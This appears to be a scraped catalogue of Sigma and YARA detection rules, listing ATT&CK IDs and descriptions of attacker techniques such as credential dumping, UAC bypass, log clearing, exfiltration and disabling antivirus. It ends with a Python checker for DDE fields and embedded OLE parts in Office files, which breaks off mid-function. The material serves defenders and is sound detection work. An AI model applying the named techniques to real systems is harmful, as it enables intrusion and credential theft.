T1505.003T1018T1033T1087
imProcessCreate

Detects patterns found in process executions caused by China Chopper like tiny (ASPX) webshells

webshell
SigmaHQ source
T1505.003
imFileEvent

Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder

SigmaHQ source
T1529
imProcessCreate

Detects the rare use of the command line tool shutdown to logoff a user

SigmaHQ source
T1021
imProcessCreate

Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended des

SigmaHQ source
T1105
imProcessCreate

Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.

SigmaHQ source
T1548
imProcessCreate

Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in

evasion
SigmaHQ source
T1133
imFileEvent

Detects an unexpected file being modified by dns.exe, which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

SigmaHQ source
imProcessCreate

Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non-default locations as seen with Bumblebee activity

SigmaHQ source
imProcessCreate

Detects unusual parent or child processes of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with Bumblebee activity

SigmaHQ source
T1048.003
imNetworkSession

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network locat

backdoor
SigmaHQ source
T1564.004
imProcessCreate

Detects use of the Windows 8.3 short name, which could be used as a method to avoid command-line detection

SigmaHQ source
T1528
imRegistry

Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.

Clear Linux Logs
sigma medium
SigmaHQ source
T1070.002
imProcessCreate

Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion

SigmaHQ source
T1115
imProcessCreate

Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard ut

SigmaHQ source
T1105
imProcessCreate

Detects a curl process start on Linux, which indicates a file download from a remote location or a simple web request to a remote server

SigmaHQ source
imProcessCreate

Detects the usage of utilities such as 'systemctl', 'service', etc. to stop or disable tools and services

File Deletion
sigma low
SigmaHQ source
T1070.004
imProcessCreate

Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity

SigmaHQ source
T1565.001
imProcessCreate

Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity

SigmaHQ source
T1140
imProcessCreate

Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded

SigmaHQ source
T1592.004
imProcessCreate

Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance

SigmaHQ source
T1222.002
imProcessCreate

Detects usage of the 'chattr' utility to remove immutable file attribute.

SigmaHQ source
imProcessCreate

Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack th

SigmaHQ source
T1071.001
imProcessCreate

Detects a suspicious curl process start on Linux with the user agent option set

SigmaHQ source
T1016
imProcessCreate

Detects enumeration of local network configuration

SigmaHQ source
T1685
imProcessCreate

Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a r

SigmaHQ source
T1489
imProcessCreate

Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.

SigmaHQ source
imProcessCreate

Detects email exfiltration via powershell cmdlets

backdoorpowershell
SigmaHQ source
T1486
imProcessCreate

Detects suspicious addition to BitLocker related registry keys via the reg.exe utility

SigmaHQ source
T1133T1136.001T1021.001
imProcessCreate

Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".

SigmaHQ source
T1036
imProcessCreate

Detects suspicious parent processes that should not have any children or should only have a single possible child program

SigmaHQ source
T1685
imProcessCreate

Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

backdoor
SigmaHQ source
T1210
imProcessCreate

Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)

SigmaHQ source
T1071.001T1197
imWebSession

Detects Bitsadmin connections to IP addresses instead of FQDN names

SigmaHQ source
imProcessCreate

Detects modification of or addition to the 'TypedPaths' key in the user or admin registry via the command line, which might indicate a persistence attempt

persistence
SigmaHQ source
T1218
imFileEvent

Detects programs on a Windows system that should not write an archive to disk

SigmaHQ source
T1059.001T1216
imProcessCreate

Detects code execution via Pester.bat (Pester - PowerShell module for testing)

powershell
SigmaHQ source
T1218
imProcessCreate

Detects the execution of DeviceCredentialDeployment to hide a process from view.

credential-theft
SigmaHQ source
T1216.001
imProcessCreate

Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.

SigmaHQ source
T1218
imProcessCreate

Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects DLL sideloading of DLLs that are part of third-party software (Zoom, Discord, etc.)

SigmaHQ source
T1105
imProcessCreate

Downloads and compresses a remote file and stores it in a cab file on the local machine.

SigmaHQ source
T1574.001
imProcessCreate

Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks

SigmaHQ source
T1059.001
imFileEvent

Detects the creation of files that indicate an interactive use of PowerShell in the SYSTEM user context

SigmaHQ source
T1546.002
imFileEvent

Adversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.

SigmaHQ source
T1574.001
imFileEvent

Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is

SigmaHQ source
T1189T1204.002T1036.005
imWebSession

Detects a flashplayer update from an unofficial location

SigmaHQ source
T1546.008
imProcessCreate

Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).

backdoor
SigmaHQ source
T1685
imProcessCreate

Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet

backdoor
SigmaHQ source
T1574.001
imProcessCreate

Detects execution of the VMware Xfer utility (VMwareXferlogs.exe) from a non-default directory, which may be an attempt to sideload an arbitrary DLL

SigmaHQ source
T1105T1608
imProcessCreate

Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents

SigmaHQ source
T1574.001
imFileEvent

Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Sea

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of an ISO file in the Outlook temp folder or in the AppData temp folder. Typical of Qakbot TTP from end-July 2022.

SigmaHQ source
imFileEvent

Detects the creation of suspicious binary files inside "\windows\system32\spool\drivers\color\" as seen in the blog referenced below

SigmaHQ source
T1053.005T1059.001
imProcessCreate

Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local

SigmaHQ source
T1140
imProcessCreate

Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

SigmaHQ source
T1548.002
DeviceImageLoadEvents

Detects the "iscsicpl.exe" UAC bypass technique that leverages DLL search order hijacking to load a custom DLL from temp or any user-controlled location in the user's %PATH%

evasion
SigmaHQ source
T1542.001
imFileEvent

Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory, which could be indicative of a UEFI-based persistence method

SigmaHQ source
T1542.001
imProcessCreate

Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section

persistence
SigmaHQ source
imProcessCreate

Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications

backdoor
SigmaHQ source
T1059.001
imProcessCreate

This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder

powershell
SigmaHQ source
T1021.003
imProcessCreate

Detects a Windows command line executable started from MMC

SigmaHQ source
T1003.002T1003.003
imFileEvent

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory

SigmaHQ source
T1059.001
imProcessCreate

Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder

powershell
SigmaHQ source
T1572T1021.001
imNetworkSession

Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443

SigmaHQ source
T1564.004
imProcessCreate

Detects PowerShell script execution from Alternate Data Stream (ADS)

powershell
SigmaHQ source
T1047
imProcessCreate

Detects a suspicious child process of Script Event Consumer (scrcons.exe).

SigmaHQ source
T1218.007
imProcessCreate

Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads

SigmaHQ source
T1059.001
imProcessCreate

Detects suspicious PowerShell invocation with a parameter substring

powershell
SigmaHQ source
T1190
imProcessCreate

Detects suspicious processes, including shells, spawned from the WinRM host process

SigmaHQ source
T1555
imProcessCreate

Detects a suspicious process pattern which could be a sign of an exploited Serv-U service

exploit
SigmaHQ source
T1087.002
imRegistry

Detects privileged user or group reconnaissance based on event ID 4661 and known privileged user or group SIDs

SigmaHQ source
imProcessCreate

Detects encoded base64 MZ header in the commandline

SigmaHQ source
T1059T1202
imProcessCreate

Detects execution of powershell scripts via Runscripthelper.exe

powershell
SigmaHQ source
T1218
imProcessCreate

Attackers can use print.exe for remote file copy

DD File Overwrite
sigma low
SigmaHQ source
T1485
imProcessCreate

Detects potential overwriting and deletion of a file using DD.

SigmaHQ source
T1190T1110
imWebSession

Detects suspicious user agent strings used by hack tools in proxy logs

SigmaHQ source
T1553.004
imProcessCreate

Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s

SigmaHQ source
T1053.002
imProcessCreate

Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execu

SigmaHQ source
imProcessCreate

Detects execution of the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges

SigmaHQ source
T1014
imProcessCreate

Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script

SigmaHQ source
T1548.002
imFileEvent

Detects the creation of a file by "dllhost.exe" in the System32 directory as part of the "IDiagnosticProfileUAC" UAC bypass technique

SigmaHQ source
T1124
imProcessCreate

Identifies use of various commands to query a system's time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.

SigmaHQ source
T1070T1685
imProcessCreate

Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.

evasion
SigmaHQ source
T1036.005
imProcessCreate

Detects an uncommon svchost parent process

SigmaHQ source
T1055
imProcessCreate

It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.

SigmaHQ source
T1003.001
imFileEvent

Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials

SigmaHQ source
T1218T1216
imProcessCreate

Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs

powershell
SigmaHQ source
T1592.004T1552.001
imProcessCreate

Detects events with patterns found in commands used for reconnaissance on linux systems

SigmaHQ source
imProcessCreate

Detects the use of the filename DumpStack.log to evade Microsoft Defender

evasion
SigmaHQ source
T1059.003
imProcessCreate

Detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking

SigmaHQ source
T1189
imWebSession

Detects XSS attempts injected via GET requests in access logs

SigmaHQ source
T1221
imWebSession

Detects SSTI attempts sent via GET requests in access logs

SigmaHQ source
T1218
imProcessCreate

Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability

exploit
Creation of a Diagcab
sigma medium
SigmaHQ source
imFileEvent

Detects the creation of a diagcab file, which could be caused by some legitimate installer or be a sign of exploitation (review the filename and its location)

SigmaHQ source
T1566
imProcessCreate

Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain

evasionphishing
Nohup Execution
sigma medium
SigmaHQ source
T1059.004
imProcessCreate

Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments

SigmaHQ source
T1222.002
imProcessCreate

Detects chmod targeting files in abnormal directory paths.

SigmaHQ source
T1059
imProcessCreate

Detects python spawning a pretty tty

SigmaHQ source
T1059
imProcessCreate

Detects java process spawning suspicious children

SigmaHQ source
T1055T1218
imFileEvent

This rule detects suspicious files created by Microsoft Sync Center (mobsync)

SigmaHQ source
T1574.001
DeviceImageLoadEvents

The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.

SigmaHQ source
T1105
imFileEvent

Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension

SigmaHQ source
T1546.002
imProcessCreate

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Po

persistence
SigmaHQ source
T1216.001
imProcessCreate

Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.

SigmaHQ source
T1216
imProcessCreate

Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.

powershell
SigmaHQ source
T1219.002
imProcessCreate

Detects a tscon.exe start as LOCAL SYSTEM

SigmaHQ source
T1036
imProcessCreate

Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM

SigmaHQ source
T1218.011
imProcessCreate

Detects RunDLL32.exe spawning explorer.exe as a child, which is very uncommon; Gamarue is often observed spawning the explorer.exe process in this unusual way

SigmaHQ source
T1547
imProcessCreate

Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors

persistence
SigmaHQ source
T1685
imProcessCreate

Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets

powershell
SigmaHQ source
T1105T1564.004
imProcessCreate

Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.

SigmaHQ source
T1615
imProcessCreate

Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information

SigmaHQ source
T1036.005
imFileEvent

Detects the creation of a copy of suspicious files (EXE/DLL) in the default GPO storage folder

SigmaHQ source
T1546T1027
imFileEvent

Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks

DLL Load via LSASS
sigma high
SigmaHQ source
T1547.008
imRegistry

Detects a method to load DLL via LSASS process using an undocumented Registry key

credential-theft
SigmaHQ source
T1548.002
imProcessCreate

Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks

SigmaHQ source
T1105T1567.002
imNetworkSession

Detects an executable that isn't dropbox but communicates with the Dropbox API

SigmaHQ source
T1204T1566.001
imProcessCreate

The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windo

SigmaHQ source
T1127T1059.007
imProcessCreate

Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud

SigmaHQ source
T1547.001
imRegistry

Detects abuse of the Windows 10 Narrator's Feedback-Hub

backdoorpersistence
SigmaHQ source
T1560.001
imProcessCreate

Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.

SigmaHQ source
T1059.004T1036
imProcessCreate

Detects suspicious interactive bash as a parent to rather uncommon child processes

SigmaHQ source
T1059T1018
imProcessCreate

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system

lateral-movement
SigmaHQ source
T1003.003
imProcessCreate

Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)

SigmaHQ source
T1021.005
imProcessCreate

Detects a suspicious UltraVNC command line flag combination that indicates an auto reconnect upon execution, e.g. at startup (as seen being used by the Gamaredon threat group)

persistence
SigmaHQ source
T1027T1059.001
imProcessCreate

Detects obfuscated PowerShell via use of MSHTA in scripts

evasionpowershell
SigmaHQ source
T1211T1059
imProcessCreate

Monitors for the hiding of possibly malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privilege to be written to and executed from.

SigmaHQ source
T1059.001
imProcessCreate

Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)

powershell
SigmaHQ source
T1190T1505.003
imFileEvent

Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation

SigmaHQ source
T1219.002
imFileEvent

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target

SigmaHQ source
T1219.002
imFileEvent

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target

SigmaHQ source
T1059.004
imProcessCreate

Detects the usage of the unsafe bpftrace option

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users

SigmaHQ source
T1087T1082
imProcessCreate

Detects a set of suspicious network related commands often used in recon stages

SigmaHQ source
T1059.001
imProcessCreate

Detects events that appear when a user clicks on a link file with a PowerShell command in it

powershell
SigmaHQ source
imProcessCreate

Uses the .NET InstallUtil.exe application in order to execute an image without logging

SigmaHQ source
T1219.002
imFileEvent

Detects the creation of log files during a TeamViewer remote session

SigmaHQ source
T1219.002
imFileEvent

TeamViewer_Desktop.exe is created during install

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of new Office macro files on the system

SigmaHQ source
T1548
imProcessCreate

Detects the doas tool execution on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does.

SigmaHQ source
T1548.002T1546.001
imRegistry

Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 3

evasionpersistence
SigmaHQ source
T1053
imFileEvent

Detects the creation of tasks from processes executed from suspicious locations

MsiExec Web Install
sigma medium
SigmaHQ source
T1218.007T1105
imProcessCreate

Detects suspicious msiexec process starts with web addresses as parameter

SigmaHQ source
T1036
imProcessCreate

Detects suspicious process run from unusual locations

SigmaHQ source
T1552.006
imProcessCreate

Detects Access to Domain Group Policies stored in SYSVOL

SigmaHQ source
T1082
imProcessCreate

Use of hostname to get information

SigmaHQ source
T1529
imProcessCreate

Use of the command line to shut down or reboot Windows

SigmaHQ source
T1082
imProcessCreate

Use of reg to get MachineGuid information

SigmaHQ source
T1547.009
imFileEvent

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in

SigmaHQ source
T1082
imProcessCreate

Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1

SigmaHQ source
T1486
imFileEvent

Ransomware creates a txt file on the user's Desktop

SigmaHQ source
T1123
imProcessCreate

Detects an attacker collecting audio via the SoundRecorder application.

apt
SigmaHQ source
T1548.002
imProcessCreate

Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.

evasion
SigmaHQ source
T1059.003T1059.001T1105
imProcessCreate

Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters, as used by several droppers (js/vbs > powershell)

powershell
SigmaHQ source
T1071.001
imWebSession

Detects suspicious user agent strings used by crypto miners in proxy logs

SigmaHQ source
T1027
imProcessCreate

Detects usage of base64 utility to decode arbitrary base64-encoded text

SigmaHQ source
T1218
imProcessCreate

Devtoolslauncher.exe executes another binary

SigmaHQ source
T1685.001T1112
imRegistry

Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stop writing events.

SigmaHQ source
T1685
imProcessCreate

Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features

SigmaHQ source
T1574
imProcessCreate

Detects using register-cimprovider.exe to execute an arbitrary DLL file.

SigmaHQ source
T1048.001T1071.004T1132.001
imProcessCreate

Detects execution of well-known DNS exfiltration tools

backdoor
SigmaHQ source
T1003.001
imProcessCreate

Detects process dump via legitimate sqldumper.exe binary

SigmaHQ source
T1218
imProcessCreate

Detects file execution using the msdeploy.exe lolbin

SigmaHQ source
T1219.002
imFileEvent

Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder

SigmaHQ source
T1071.001
imWebSession

Detects a potentially suspicious empty user agent string in proxy logs. Could potentially indicate an uncommon request method.

SigmaHQ source
T1218
imProcessCreate

Detects indirect command execution via Program Compatibility Assistant pcwrun.exe

Interactive AT Job
sigma high
SigmaHQ source
T1053.002
imProcessCreate

Detects an interactive AT job, which may be used as a form of privilege escalation.

SigmaHQ source
T1018
imProcessCreate

Detects the enumeration of other remote systems.

SigmaHQ source
T1021.003
imProcessCreate

Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe

lateral-movement
SigmaHQ source
T1546.009
imRegistry

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and r

backdoorpersistence
SigmaHQ source
T1195T1195.001
imFileEvent

Detects Octopus Scanner Malware.

SigmaHQ source
T1218
imProcessCreate

OpenWith.exe executes another binary

SigmaHQ source
T1546.002
imRegistry

Detects value modification of registry key containing path to binary used as screensaver.

SigmaHQ source
T1123
imRegistry

Potential adversaries accessing the microphone and webcam in an endpoint.

PwnDrp Access
sigma critical
SigmaHQ source
T1071.001T1102.001T1102.003
imWebSession

Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity

SigmaHQ source
T1112
imRegistry

Detects actions caused by the RedMimicry Winnti playbook

SigmaHQ source
T1112
imRegistry

Detects the presence of a registry key created during Azorult execution

SigmaHQ source
T1059
imProcessCreate

Detects PowerShell script execution via input stream redirect

powershell
SigmaHQ source
T1012T1552.002
imRegistry

Detects handles requested to SAM registry hive

Sdclt Child Processes
sigma medium
SigmaHQ source
T1548.002
imProcessCreate

A general detection for sdclt spawning new processes. This could be an indicator of sdclt being used in UAC bypass techniques.

evasion
SigmaHQ source
T1105
imProcessCreate

Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet

SigmaHQ source
T1566.001T1203T1059.003
imProcessCreate

Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation

exploit
SigmaHQ source
T1059
imProcessCreate

Detects suspicious process related to rasdial.exe

SigmaHQ source
T1218.011
imProcessCreate

setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This t

persistence
SigmaHQ source
T1112
imProcessCreate

Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistenc

persistence
SigmaHQ source
T1012
imRegistry

Detects handle requests and access operations to specific registry keys to calculate the SysKey

SigmaHQ source
T1059
imProcessCreate

Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)

backdoor
SigmaHQ source
T1548.002
imRegistry

Unfixed method for UAC bypass on Windows 10. WSReset.exe is a file associated with the Windows Store. It will run a binary file referenced in a low-privilege registry key.

evasion
SigmaHQ source
T1574.008
imProcessCreate

Detects using SettingSyncHost.exe to run a hijacked binary

SigmaHQ source
T1027.004
imProcessCreate

Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.

SigmaHQ source
T1112
imRegistry

Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is us

credential-theft
SigmaHQ source
T1003.001
imRegistry

Detects the use of Windows Credential Editor (WCE)

credential-theft
SigmaHQ source
T1071.001
imWebSession

Detects Windows PowerShell Web Access

SigmaHQ source
T1071.001
imWebSession

Detects WebDav DownloadCradle

SigmaHQ source
T1547
imRegistry

Detects potential malicious modification of run keys by winekey or team9 backdoor

backdoor
SigmaHQ source
T1546.003
DeviceImageLoadEvents

Detects WMI command line event consumers

persistencewmi
SigmaHQ source
T1546.003
imFileEvent

Detects file writes of WMI script event consumer

SigmaHQ source
T1496
imNetworkSession

Detects process connections to a Monero crypto mining pool

SigmaHQ source
T1082
imProcessCreate

Detects system information discovery commands

Yara-Rules source

Generic rule for MacGyver.cap

community
Yara-Rules source

Generic rule for Hacktool:Win32/EMVSoft which installs MacGyver.cap

community
ShimCache Flush
sigma high
SigmaHQ source
T1112
imProcessCreate

Detects actions that clear the local ShimCache and remove forensic evidence

SigmaHQ source
T1218.003
imProcessCreate

Detects various indicators of Microsoft Connection Manager Profile Installer execution

SigmaHQ source
T1218.003
imRegistry

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Yara-Rules source

Python has been used frequently by threat actors for compiling executable file with source code. I found python Stuxnet source code that can be executed with required dependencies. This rule is create

community
signature-base source

Rule detects the Drovorub-kernel module based on unique strings

apt28_drovorubflorian-roth
signature-base source

This YARA rule detects components of the APT28_drovorub malware

apt28_drovorubflorian-roth
signature-base source

This YARA rule detects network communication

apt28_drovorubflorian-roth
signature-base source

Rule to detect statically linked POCO and OpenSSL libraries (COULD be Drovorub related and should be further investigated)

apt28_genericflorian-roth
Yara-Rules source

YARA rule: Email_Generic_PHP_Mailer_Script

community
Yara-Rules source

MedussaHTTP v20190812

community
Yara-Rules source

Memory rule for a .net RAT/Agent first found with .pdb referencing almashreq

backdoorcommunity
Yara-Rules source

Generic rule for hostile ACE archive using CVE-2018-20250

communityexploit
Yara-Rules source

Generic rule for Winpot aka ATMPot

community
Yara-Rules source

Search strings and procedure in HelloWorld ATM Malware

community
Yara-Rules source

Detects APT10 MenuPass Uppercut

aptcommunityuppercut
Yara-Rules source

Detects APT10 MenuPass Phishing

aptcommunityphishing
Yara-Rules source

Detects maldoc with a suspicious OLE target

community
Yara-Rules source

Detect Word 2007 XML Document in the Flat OPC format w/ embedded Microsoft Office 2007+ document

community
Yara-Rules source

Rule for detection of Neuron2 based on the routine used to decrypt the payload

communityturla
Yara-Rules source

Rule for detection of the .NET payload for Neuron2 based on strings used

communityturla
Yara-Rules source

The YARA rule 'MW_neuron2_loader_strings' detects Neuron2 malware loaders by identifying

communityturla
Yara-Rules source

Detects IcedID (rule adjusted several times)

community
Yara-Rules source

Detects Mirai Satori MALW

community
Yara-Rules source

Generic detection for MiraiX version 7

community
Yara-Rules source

Detects Mirai Satori_gen

community
Yara-Rules source

Detects Mirai Okiru MALW

community
Yara-Rules source

Strings of ELF Linux/Httpsd (backdoor, downloader, remote command execution)

backdoorcommunity
Yara-Rules source

Detects ELF Linux/Httpsd i686

community
Yara-Rules source

Detects Linux/Httpsd ARMv5

community
r4 wiper 1
yara low
Yara-Rules source

YARA rule: r4_wiper_1

community
r4 wiper 2
yara low
Yara-Rules source

YARA rule: r4_wiper_2

community
Linux.IotReaper
yara low
Yara-Rules source

Linux.IotReaper

community
Yara-Rules source

Detects maldoc with exploit for CVE-2017-11882

communityexploit
Yara-Rules source

The 'Contains_DDE_Protocol' rule detects the use of the

community
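
The Flat OPC entry above and the 'Contains_DDE_Protocol' entry both key on document structure rather than on a malware family. As an added example (my code, not the rule authors' and not the YARA rule bodies, which this page does not show), the following Python reproduces the two checks over constructed samples built in the same file: a .docx whose DDEAUTO field is split across two runs, as obfuscated samples do, and a Flat OPC XML whose pkg:binaryData part decodes to an OLE2 container. The part names and the harmless command in the DDE field are made up for the sample.

```python
"""Content checks behind two of the maldoc YARA rules above (a DDE/DDEAUTO field in a
Word document, and a Flat OPC XML document carrying an embedded binary part), written in
Python and run over constructed samples built in this file."""
import base64
import io
import re
import zipfile

# --- DDE fields in OOXML ---------------------------------------------------------------
# Field codes live in <w:instrText> runs (or the w:instr attribute of <w:fldSimple>). One
# field is often split across several runs, so all run texts of a part are concatenated
# before the DDE keyword is looked for.
INSTR_RE = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
FLDSIMPLE_RE = re.compile(r'<w:fldSimple[^>]*\bw:instr="([^"]*)"', re.S)
DDE_RE = re.compile(r"\bDDE(AUTO)?\b", re.I)


def has_dde_field(docx_bytes: bytes) -> bool:
    """True if any WordprocessingML part of the .docx carries a DDE or DDEAUTO field."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            xml = z.read(name).decode("utf-8", "replace")
            field_text = "".join(INSTR_RE.findall(xml)) + " " + " ".join(FLDSIMPLE_RE.findall(xml))
            if DDE_RE.search(field_text):
                return True
    return False


# --- Flat OPC with an embedded binary part ----------------------------------------------
# Flat OPC is one XML file: an mso-application processing instruction followed by a
# pkg:package whose parts are inline XML (pkg:xmlData) or base64 (pkg:binaryData). An
# embedded OLE object or nested Office file is a binary part whose decoded bytes start
# with the OLE2 magic or a ZIP local-file header.
MSO_WORD_PI = b'<?mso-application progid="Word.Document"?>'
PART_NAME_RE = re.compile(rb'<pkg:part\s+pkg:name="([^"]+)"')
BINARY_RE = re.compile(rb"<pkg:binaryData>(.*?)</pkg:binaryData>", re.S)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"


def flat_opc_embedded_parts(xml_bytes: bytes) -> list:
    """Names of binary parts in a Word Flat OPC file that decode to an OLE2 or ZIP container."""
    if MSO_WORD_PI not in xml_bytes or b"<pkg:package" not in xml_bytes:
        return []
    hits = []
    for part in xml_bytes.split(b"</pkg:part>"):   # one chunk per part, so data stays with its name
        name, data = PART_NAME_RE.search(part), BINARY_RE.search(part)
        if not (name and data):
            continue
        try:
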